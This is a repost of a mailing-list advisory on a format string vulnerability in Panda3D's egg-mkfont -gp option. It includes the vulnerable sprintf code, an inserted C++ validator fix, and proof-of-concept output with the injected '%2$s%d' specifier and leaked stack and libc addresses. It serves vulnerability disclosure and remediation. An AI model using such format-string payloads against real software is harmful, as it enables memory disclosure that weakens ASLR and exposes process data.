Panda3d v1.10.16 Uncontrolled Format String in Panda3D egg-mkfont Allows Stack Memory Disclosure
Summary: Panda3D's egg-mkfont tool contains an uncontrolled format string vulnerability. The format pattern supplied through the -gp option is passed straight to sprintf(), so an attacker can inject additional format specifiers, read stack memory into the generated output files, leak sensitive process data, and weaken ASLR.
2026-1-6 06:59:36 Author: seclists.org

Full Disclosure mailing list archives


From: Ron E <ronaldjedgerson () gmail com>
Date: Thu, 1 Jan 2026 14:35:16 -0500

Panda3D’s egg-mkfont utility contains an uncontrolled format string
vulnerability that allows disclosure of stack-resident memory. The -gp
(glyph pattern) command-line option allows users to specify a formatting
pattern intended for generating glyph texture filenames. This pattern is
passed directly as the format string to sprintf() without validation or
sanitization. If the supplied pattern contains additional format specifiers
beyond the expected numeric placeholder (e.g., %d), sprintf() will read
unintended values from the stack. The resulting formatted output is written
into attacker-accessible files, including generated .egg and .png files. As
a result, stack memory contents and pointer-sized values may be disclosed
to an attacker.

Root Cause Analysis:

The vulnerability originates from the following code in eggMakeFont.cxx:

    char buffer[1024];
    sprintf(buffer, _output_glyph_pattern.c_str(), character);


   - _output_glyph_pattern is populated directly from user input via the -gp
     option.
   - The user-supplied string is used as the format string to sprintf().
   - Only a single argument (character) is provided, regardless of how many
     format specifiers are present.
   - When additional format specifiers (e.g., %p, %x, or positional forms
     such as %n$p, which let the attacker select which argument slot is
     read) are included, sprintf() reads unintended stack values.
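As an added example (this is not code from the Panda3D project or from the advisory), the following C++ shows the check a fix of this bug needs: a whitelist that accepts a glyph pattern only if it contains exactly one plain integer placeholder, and a formatter that calls snprintf() only on a pattern that passed the check. The function names glyph_pattern_is_safe and format_glyph_name are assumptions, as is the decision to accept only %d/%i with '-' and '0' flags and a width; a literal percent sign is still written as %%.

```cpp
// Added example; not Panda3D's own code. glyph_pattern_is_safe() is a
// whitelist check for a user-supplied printf-style glyph pattern, and
// format_glyph_name() is a hardened replacement for the unchecked
// sprintf(buffer, _output_glyph_pattern.c_str(), character) call.
// Both function names are hypothetical.
#include <cstdio>
#include <string>

// Returns true only if `pattern` contains exactly one integer conversion
// ("%d" or "%i", optionally with '-' and '0' flags and a width, e.g. "%03d")
// and no other conversion. "%%" is a literal percent sign and is allowed.
// Everything else is rejected: "%p", "%x", "%s", "%n", a second "%d",
// positional forms such as "%2$s", "%*d" (width taken from the argument
// list), length modifiers such as "%ld", and a trailing lone '%'.
bool glyph_pattern_is_safe(const std::string &pattern) {
  int conversions = 0;
  for (size_t i = 0; i < pattern.size(); ++i) {
    if (pattern[i] != '%') continue;
    ++i;
    if (i >= pattern.size()) return false;   // dangling '%' at end of string
    if (pattern[i] == '%') continue;         // "%%": literal percent sign
    // Flags and width digits; none of these changes how many arguments
    // the printf engine will consume.
    while (i < pattern.size() &&
           (pattern[i] == '-' || (pattern[i] >= '0' && pattern[i] <= '9'))) {
      ++i;
    }
    if (i >= pattern.size()) return false;   // flags/width with no conversion
    if (pattern[i] != 'd' && pattern[i] != 'i') return false;
    ++conversions;
  }
  // Exactly one placeholder: zero would give every glyph the same file name,
  // two or more would read an argument slot that was never passed.
  return conversions == 1;
}

// Formats the glyph index with a validated pattern. Returns an empty string
// when validation fails or the result does not fit, so an unvalidated
// pattern never reaches snprintf().
std::string format_glyph_name(const std::string &pattern, int character) {
  if (!glyph_pattern_is_safe(pattern)) return std::string();
  char buffer[1024];
  int n = std::snprintf(buffer, sizeof buffer, pattern.c_str(), character);
  if (n < 0 || n >= static_cast<int>(sizeof buffer)) return std::string();
  return std::string(buffer, static_cast<size_t>(n));
}

int main() {
  // Constructed inputs: a benign pattern, the pattern from the advisory's
  // PoC, and a classic pointer-leak pattern.
  const char *patterns[] = {"glyph_%03d.png", "%2$s%d", "%p%p%p%p"};
  for (const char *p : patterns) {
    std::string name = format_glyph_name(p, 65);
    std::printf("%-16s -> %s\n", p, name.empty() ? "REJECTED" : name.c_str());
  }
  return 0;
}
```

The check deliberately refuses anything it does not understand rather than trying to enumerate bad specifiers: `%*d` and `%ld` are as dangerous as `%p` because they change how many bytes or arguments are read, and a denylist of `%p`/`%x`/`%s` would miss them.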

Impact:

An attacker with the ability to invoke egg-mkfont can:

   - Read stack-resident memory values
   - Leak pointer-sized values, including addresses
   - Reduce the effectiveness of ASLR
   - Extract sensitive process memory via generated output files

Proof of Concept:

The following output, produced by the author's info-leak.py harness (the
script itself is not included in the post), demonstrates disclosure of stack
memory via injected format specifiers. The egg-mkfont invocation, visible in
the leaked strings below, passes -gp '%2$s%d': a positional specifier that
makes sprintf() interpret the second variadic argument slot, which was never
passed, as a pointer to a string:

python3 info-leak.py

======================================================================
DUMPING ALL READABLE STRINGS FROM MEMORY
======================================================================

[*] Reading strings from stack positions 1-50...
[Param  2] <Comment> {
[Param  2]   "egg-mkfont -o /tmp/s2.egg -gp '%2$s%d'
/usr/share/fonts/truetype/de
[Param  2] <Texture> "
[Param  2]   <Scalar> format { alpha }
[Param  2]   <Scalar> minfilter { linear_mipmap_linear }
[Param  2]   <Scalar> magfilter { linear_mipmap_linear }
[Param  2]   <Scalar> anisotropic-degree { 0 }
[Param  2]   <Scalar> quality-level { best }
[Param  2]   <Transform> {
[Param  2]     <Matrix3> {
[Param  2]       0.0369977678571429 0 0
[Param  2]       0 0.16015625 0
[Param  2]       0.154352678571429 0.84375 1
[Param  2]       0.0604806673728814 0 0
[Param  2]       0 0.1328125 0
[Param  2]       0.826204978813559 0.74609375 1
[Param  2]       0.0565696022727273 0 0
[Param  2]       0 0.054375 0
[Param  2]       0.0898792613636364 0.46109375 1
[Param  2]       0.0153245192307692 0 0
[Param  2]       0 0.0935763888888889 0
[Param  2]       0.201322115384615 0.636805555555556 1
[Param  2]       0 0.12890625 0
[Param  2]       0.679723011363636 0.62109375 1
[Param  2]       0.0350378787878788 0 0
[Param  2]       0 0.0504415760869565 0
[Param  2]       0.255918560606061 0.465013586956522 1
[Param  2]       0.048828125 0 0
[Param  2]       0 0.02734375 0
[Param  2]       0.232421875 0.4453125 1
[Param  2]       0.046875 0 0
[Param  2]       0 0.13671875 0
[Param  2]       0.783203125 0.8671875 1
[Param  2]       0.0252207880434783 0 0
[Param  2]       0 0.152239583333333 0
[Param  2]       0.388756793478261 0.851614583333333 1
[Param  2]       0.0467881944444445 0 0
[Param  2]       0.466840277777778 0.734375 1
[Param  2]       0 0.10546875 0
[Param  2]       0.365277777777778 0.51171875 1

--snip--

[+] Leaked 5970 addresses!

[LEAK]  Param  1: 0xffffff860000003f - Stack-resident pointer-sized value
[LEAK]  Param  1: 0xffffff860000003e - Stack-resident pointer-sized value
[LEAK]  Param 29: 0xfffff68200008217 - Pointer within libc mapping
[LIBC]  Param 29: 0xfffff6628a340 - libc+0x8a340

--snip--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Source: https://seclists.org/fulldisclosure/2026/Jan/11